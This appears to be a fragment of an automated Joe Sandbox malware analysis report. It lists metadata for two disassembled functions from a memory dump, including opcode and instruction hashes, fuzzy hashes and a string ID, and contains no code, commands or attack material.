                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 365b6c92343ee7e18a63fcc0f4708a3498f88ad091da8180b6b02659c71503f5
                                                                                                                                    • Instruction ID: 724bdda38851351619da7738ae76c9309e5f4c1d5a851bae78e6986db7190e44
                                                                                                                                    • Opcode Fuzzy Hash: 365b6c92343ee7e18a63fcc0f4708a3498f88ad091da8180b6b02659c71503f5
                                                                                                                                    • Instruction Fuzzy Hash: FC517074A05228CFCB65DF24D894BAEB7B2BF4A301F5085EAD40AA7354DB319E81CF50
                                                                                                                                    Function 00241548 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: \:P$\:P$\:P$\:P
                                                                                                                                    • API String ID: 0-139165651
                                                                                                                                    • Opcode ID: 75b630566b90efbea85ab5c88e34a510f4be1232b979346c6f52e4c018299399
                                                                                                                                    • Instruction ID: e6db91f75cc7f1fd664c95f5f5563bb4ebbdf11952b9978e034037c928b16e4f
                                                                                                                                    • Opcode Fuzzy Hash: 75b630566b90efbea85ab5c88e34a510f4be1232b979346c6f52e4c018299399
                                                                                                                                    • Instruction Fuzzy Hash: 46417B70A143099FCB0AEFB8C4916BEBBB2FF85300F5045A9D015AB395DB309A91CB91